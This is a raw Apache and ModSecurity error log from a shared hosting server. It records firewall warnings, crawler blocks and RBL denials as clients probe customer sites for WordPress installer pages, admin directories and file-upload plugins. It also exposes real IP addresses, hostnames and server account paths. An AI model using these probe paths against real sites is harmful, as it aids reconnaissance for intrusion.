[Tue May 26 17:03:46.509118 2026] [security2:error] [pid 851641:tid 851849] [client 138.199.19.160:45290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/admin/fckeditor/editor/filemanager/"] [unique_id "ahWFGhp8QSN2510avp4mTAAAAE4"]
[Tue May 26 17:03:46.954874 2026] [security2:error] [pid 851641:tid 851853] [client 69.58.72.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWFGhp8QSN2510avp4mXQAAAFI"], referer: https://anujtradingco.com
[Tue May 26 17:03:47.119755 2026] [security2:error] [pid 851641:tid 851884] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGxp8QSN2510avp4mZgAAAHE"]
[Tue May 26 17:03:47.119785 2026] [security2:error] [pid 851641:tid 851884] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGxp8QSN2510avp4mZgAAAHE"]
[Tue May 26 17:03:47.120086 2026] [security2:error] [pid 851641:tid 851838] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/sites/default/files/"] [unique_id "ahWFGhp8QSN2510avp4mZAAAAEM"]
[Tue May 26 17:03:47.183958 2026] [log_config:warn] [pid 839808:tid 839979] (32)Broken pipe: [client 42.108.192.133:60878] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: http://www.traderscafe.in/
[Tue May 26 17:03:47.183977 2026] [log_config:warn] [pid 839808:tid 839979] (32)Broken pipe: [client 42.108.192.133:60878] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: http://www.traderscafe.in/
[Tue May 26 17:03:47.560646 2026] [security2:error] [pid 851641:tid 851859] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFGxp8QSN2510avp4mbAAAAFg"]
[Tue May 26 17:03:47.907204 2026] [security2:error] [pid 851641:tid 851871] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGxp8QSN2510avp4mfQAAAGQ"]
[Tue May 26 17:03:47.907230 2026] [security2:error] [pid 851641:tid 851871] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFGxp8QSN2510avp4mfQAAAGQ"]
[Tue May 26 17:03:47.907677 2026] [security2:error] [pid 851641:tid 851894] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/admin/controller/extension/extension/"] [unique_id "ahWFGxp8QSN2510avp4megAAAHs"]
[Tue May 26 17:03:48.200959 2026] [security2:error] [pid 851641:tid 851796] [client 5.255.99.53:46476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahWFGxp8QSN2510avp4mhAAAABk"], referer: http://preetishah.com/_nuxt/manifest.json
[Tue May 26 17:03:48.292603 2026] [security2:error] [pid 851641:tid 851785] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHBp8QSN2510avp4mkQAAAA4"]
[Tue May 26 17:03:48.292646 2026] [security2:error] [pid 851641:tid 851785] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHBp8QSN2510avp4mkQAAAA4"]
[Tue May 26 17:03:48.299805 2026] [security2:error] [pid 851641:tid 851777] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/modules/mod_simplefileuploadv1.3/elements/"] [unique_id "ahWFHBp8QSN2510avp4mjwAAAAY"]
[Tue May 26 17:03:48.922282 2026] [security2:error] [pid 851641:tid 851883] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHBp8QSN2510avp4mogAAAHA"]
[Tue May 26 17:03:48.923057 2026] [security2:error] [pid 851641:tid 851838] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/components/"] [unique_id "ahWFHBp8QSN2510avp4moAAAAEM"]
[Tue May 26 17:03:48.988918 2026] [security2:error] [pid 851641:tid 851842] [client 114.119.133.194:53099] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWFHBp8QSN2510avp4mqQAAAEc"], referer: http://haddingtonwines.com/cart?remove_item=1e8c391abfde9abea82d75a2d60278d4
[Tue May 26 17:03:49.056849 2026] [security2:error] [pid 851641:tid 851881] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFHBp8QSN2510avp4mnwAAAG4"]
[Tue May 26 17:03:49.329553 2026] [security2:error] [pid 851641:tid 851885] [client 31.57.184.107:49154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWFHRp8QSN2510avp4mswAAAHI"], referer: https://www.facebook.com/
[Tue May 26 17:03:49.397567 2026] [security2:error] [pid 851641:tid 851859] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHRp8QSN2510avp4mtgAAAFg"]
[Tue May 26 17:03:49.397617 2026] [security2:error] [pid 851641:tid 851859] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHRp8QSN2510avp4mtgAAAFg"]
[Tue May 26 17:03:49.398246 2026] [security2:error] [pid 851641:tid 851886] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/admin/uploads/images/"] [unique_id "ahWFHRp8QSN2510avp4mtAAAAHM"]
[Tue May 26 17:03:49.807464 2026] [security2:error] [pid 851641:tid 851849] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHRp8QSN2510avp4mxQAAAE4"]
[Tue May 26 17:03:49.807486 2026] [security2:error] [pid 851641:tid 851849] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHRp8QSN2510avp4mxQAAAE4"]
[Tue May 26 17:03:49.808011 2026] [security2:error] [pid 851641:tid 851818] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/classic-editor/"] [unique_id "ahWFHRp8QSN2510avp4mwwAAAC8"]
[Tue May 26 17:03:50.905920 2026] [security2:error] [pid 851641:tid 851886] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHhp8QSN2510avp4m8QAAAHM"]
[Tue May 26 17:03:50.905951 2026] [security2:error] [pid 851641:tid 851886] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHhp8QSN2510avp4m8QAAAHM"]
[Tue May 26 17:03:50.906578 2026] [security2:error] [pid 851641:tid 851857] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/fonts/"] [unique_id "ahWFHhp8QSN2510avp4m7wAAAFY"]
[Tue May 26 17:03:51.407529 2026] [security2:error] [pid 851641:tid 851800] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFHhp8QSN2510avp4m-gAAAB0"]
[Tue May 26 17:03:51.417083 2026] [security2:error] [pid 851641:tid 851827] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHxp8QSN2510avp4nAQAAADg"]
[Tue May 26 17:03:51.417112 2026] [security2:error] [pid 851641:tid 851827] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHxp8QSN2510avp4nAQAAADg"]
[Tue May 26 17:03:51.417818 2026] [security2:error] [pid 851641:tid 851879] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/contact-form-7/admin/js/"] [unique_id "ahWFHxp8QSN2510avp4m_wAAAGw"]
[Tue May 26 17:03:51.833507 2026] [security2:error] [pid 851641:tid 851852] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHxp8QSN2510avp4nEwAAAFE"]
[Tue May 26 17:03:51.833536 2026] [security2:error] [pid 851641:tid 851852] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFHxp8QSN2510avp4nEwAAAFE"]
[Tue May 26 17:03:51.833798 2026] [security2:error] [pid 851641:tid 851856] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/contact-form-7/"] [unique_id "ahWFHxp8QSN2510avp4nEQAAAFU"]
[Tue May 26 17:03:52.029266 2026] [security2:error] [pid 851641:tid 851803] [client 113.162.161.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFHxp8QSN2510avp4nEAAAACA"]
[Tue May 26 17:03:52.225919 2026] [security2:error] [pid 851641:tid 851791] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIBp8QSN2510avp4nHQAAABQ"]
[Tue May 26 17:03:52.226474 2026] [security2:error] [pid 851641:tid 851873] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/wordpress/"] [unique_id "ahWFIBp8QSN2510avp4nGwAAAGY"]
[Tue May 26 17:03:52.537409 2026] [autoindex:error] [pid 851641:tid 851862] [client 138.199.19.160:48718] AH01276: Cannot serve directory /home2/chrisdjb/public_html/wp-admin/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:52.538112 2026] [security2:error] [pid 851641:tid 851862] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "christinaspromotions.com"] [uri "/cgi-sys/403.html"] [unique_id "ahWFIBp8QSN2510avp4nJAAAAFs"]
[Tue May 26 17:03:52.994316 2026] [security2:error] [pid 851641:tid 851833] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIBp8QSN2510avp4nMAAAAD4"]
[Tue May 26 17:03:52.994352 2026] [security2:error] [pid 851641:tid 851833] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIBp8QSN2510avp4nMAAAAD4"]
[Tue May 26 17:03:52.995195 2026] [security2:error] [pid 851641:tid 851797] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/wordpress-seo/js/dist/"] [unique_id "ahWFIBp8QSN2510avp4nLgAAABo"]
[Tue May 26 17:03:53.055025 2026] [autoindex:error] [pid 851641:tid 851857] [client 54.205.63.235:62289] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:03:53.126996 2026] [security2:error] [pid 851641:tid 851861] [client 54.205.63.235:62289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nOQAAAFo"]
[Tue May 26 17:03:53.196444 2026] [security2:error] [pid 851641:tid 851878] [client 54.205.63.235:62502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nRAAAAGs"]
[Tue May 26 17:03:53.196550 2026] [security2:error] [pid 851641:tid 851828] [client 54.205.63.235:62501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nQwAAADk"]
[Tue May 26 17:03:53.197703 2026] [security2:error] [pid 851641:tid 851809] [client 54.205.63.235:62503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nRgAAACY"]
[Tue May 26 17:03:53.198081 2026] [security2:error] [pid 851641:tid 851879] [client 54.205.63.235:62506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nSQAAAGw"]
[Tue May 26 17:03:53.198188 2026] [security2:error] [pid 851641:tid 851849] [client 54.205.63.235:62505] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nSAAAAE4"]
[Tue May 26 17:03:53.198208 2026] [security2:error] [pid 851641:tid 851821] [client 54.205.63.235:62510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nTQAAADI"]
[Tue May 26 17:03:53.198269 2026] [security2:error] [pid 851641:tid 851782] [client 54.205.63.235:62504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahWFIRp8QSN2510avp4nRwAAAAs"]
[Tue May 26 17:03:53.198309 2026] [security2:error] [pid 851641:tid 851894] [client 54.205.63.235:62508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nSwAAAHs"]
[Tue May 26 17:03:53.198433 2026] [security2:error] [pid 851641:tid 851871] [client 54.205.63.235:62509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nTAAAAGQ"]
[Tue May 26 17:03:53.198479 2026] [security2:error] [pid 851641:tid 851860] [client 54.205.63.235:62507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nSgAAAFk"]
[Tue May 26 17:03:53.198699 2026] [security2:error] [pid 851641:tid 851784] [client 54.205.63.235:62511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nTwAAAA0"]
[Tue May 26 17:03:53.199138 2026] [security2:error] [pid 851641:tid 851814] [client 54.205.63.235:62513] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nUgAAACs"]
[Tue May 26 17:03:53.199199 2026] [security2:error] [pid 851641:tid 851853] [client 54.205.63.235:62512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nUAAAAFI"]
[Tue May 26 17:03:53.199219 2026] [security2:error] [pid 851641:tid 851840] [client 54.205.63.235:62514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nUQAAAEU"]
[Tue May 26 17:03:53.266548 2026] [security2:error] [pid 851641:tid 851847] [client 54.205.63.235:62600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "restmoll.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahWFIRp8QSN2510avp4nVQAAAEw"]
[Tue May 26 17:03:53.316761 2026] [security2:error] [pid 851641:tid 851866] [client 138.199.19.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIRp8QSN2510avp4nTgAAAF8"]
[Tue May 26 17:03:53.316786 2026] [security2:error] [pid 851641:tid 851866] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIRp8QSN2510avp4nTgAAAF8"]
[Tue May 26 17:03:53.321132 2026] [security2:error] [pid 851641:tid 851795] [client 138.199.19.160:48718] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "christinaspromotions.com"] [uri "/wp-content/plugins/wordpress-seo/"] [unique_id "ahWFIRp8QSN2510avp4nQgAAABg"]
[Tue May 26 17:03:53.772086 2026] [security2:error] [pid 851641:tid 851788] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWFIRp8QSN2510avp4nWQAAABE"]
[Tue May 26 17:03:55.179494 2026] [security2:error] [pid 851641:tid 851849] [client 138.199.19.160:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWFIxp8QSN2510avp4nfwAAAE4"]
